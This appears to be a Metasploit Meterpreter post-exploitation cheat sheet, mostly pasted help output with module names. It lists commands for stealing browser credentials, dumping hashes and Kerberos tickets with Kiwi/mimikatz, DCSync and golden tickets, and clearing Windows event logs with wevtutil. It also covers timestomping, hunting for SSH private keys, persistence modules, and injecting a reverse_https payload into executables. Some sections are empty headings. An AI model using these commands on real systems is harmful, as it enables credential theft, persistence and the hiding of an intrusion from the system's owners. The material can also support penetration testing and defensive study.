q-7 Data
q-7 Data
==========================
meterpreter > download -h
==========================
Usage: download [options] src1 src2 src3 ... destination
OPTIONS:
EXAMPLES:
========================
meterpreter > upload -h
========================
Usage: upload [options] src1 src2 src3 ... destination
OPTIONS:
-h Help banner
-r Upload recursively
=============================
meterpreter > run scraper -h
=============================
Scraper -- harvest system info including network shares, registry hives and
password hashes
Info is stored in /home/kali/.msf4/logs/scripts/scraper
USAGE: run scraper
OPTIONS:
-h Help menu.
=============================
meterpreter > run winenum -h
=============================
WinEnum -- Windows local enumeration
OPTIONS:
-c Change Access, Modified and Created times of executables that were run on
the target machine and clear the EventLog
-h Help menu.
-m Migrate the Meterpreter Session from it current process to a new cmd.exe
before doing anything
-r Dump, compress and download entire Registry
=================================
meterpreter > timestomp <file> -h
=================================
Usage: timestomp <file(s)> OPTIONS
OPTIONS:
EXAMPLES:
timestomp <file> -v
timestomp <file> -z '01/01/2000 11:21:11'
=====================
meterpreter > reg -h
=====================
Usage: reg [command] [options]
Interact with the target machine's registry.
OPTIONS:
-d The data to store in the registry value.
-h Help menu.
-k The registry key path (E.g. HKLM\Software\Foo).
-r The remote machine name to connect to (with current process credentials
-t The registry value type (E.g. REG_SZ).
-v The registry value name (E.g. Stuff).
-w Set KEY_WOW64 flag, valid values [32|64].
COMMANDS:
EXAMPLES:
===============================
meterpreter > run gettelnet -h
===============================
Windows Telnet Server Enabler Meterpreter Script
Usage: gettelnet -u <username> -p <password>
OPTIONS:
EXAMPLES:
===========================
meterpreter > POST MODULES
===========================
run post/windows/manage/migrate
run post/windows/gather/enum_av
run post/windows/gather/credentials/chrome
run post/windows/gather/enum_chrome
run post/multi/gather/firefox_creds
run post/windows/gather/usb_history
run post/windows/gather/dumplinks
run post/windows/gather/enum_applications
run post/windows/gather/enum_logged_on_users
run post/windows/gather/screen_spy
run windows/manage/rollback_defender_signatures
run post/linux/gather/checkvm
===================
MODULES > EXPLOITS
===================
use exploit/windows/local/persistence_service
use post/windows/manage/persistence_exe
use exploit/windows/local/persistence
===============
Shell Commands
===============
Shutdown Firewall
^^^^^^^^^^^^^^^^^
Clearing Events
^^^^^^^^^^^^^^^
cmd.exe /c wevtutil.exe cl System
cmd.exe /c wevtutil.exe cl Security
SSH Keys
^^^^^^^^
ssh-keygen
find / -name authorized_keys 2> /dev/null
find / -name id_rsa 2> /dev/null
cat ~/.ssh/id_rsa.pub
use post/linux/manage/sshkey_persistence
========================
meterpreter > load kiwi
========================
Kiwi Commands
=============
Command Description
------- -----------
creds_all Retrieve all credentials (parsed)
creds_kerberos Retrieve Kerberos creds (parsed)
creds_livessp Retrieve Live SSP creds
creds_msv Retrieve LM/NTLM creds (parsed)
creds_ssp Retrieve SSP creds
creds_tspkg Retrieve TsPkg creds (parsed)
creds_wdigest Retrieve WDigest creds (parsed)
dcsync Retrieve user account information via DCSync
(unparsed)
dcsync_ntlm Retrieve user account NTLM hash, SID and RID via
DCSync
golden_ticket_create Create a golden kerberos ticket
kerberos_ticket_list List all kerberos tickets (unparsed)
kerberos_ticket_purge Purge any in-use kerberos tickets
kerberos_ticket_use Use a kerberos ticket
kiwi_cmd Execute an arbitary mimikatz command (unparsed)
lsa_dump_sam Dump LSA SAM (unparsed)
lsa_dump_secrets Dump LSA secrets (unparsed)
password_change Change the password/hash of a user
wifi_list List wifi profiles/creds for the current user
wifi_list_shared List shared wifi profiles/creds (requires SYSTEM)
==============================
meterpreter > load peinjector
==============================
meterpreter > injectpe -h
Usage: injectpe -p < windows/meterpreter/reverse_https > -t < c:\target_file.exe >,
-o < lhost=192.168.1.123, lport=4443 >
OPTIONS:
-h Help banner
-o Comma separated list of additional options for payload if needed in
'opt1=val,opt2=val' format.
-p Windows Payload to inject into the targer executable.
-t Path of the target executable to be injected
EXAMPLES:
=======================
Msfconsole > Listeners
=======================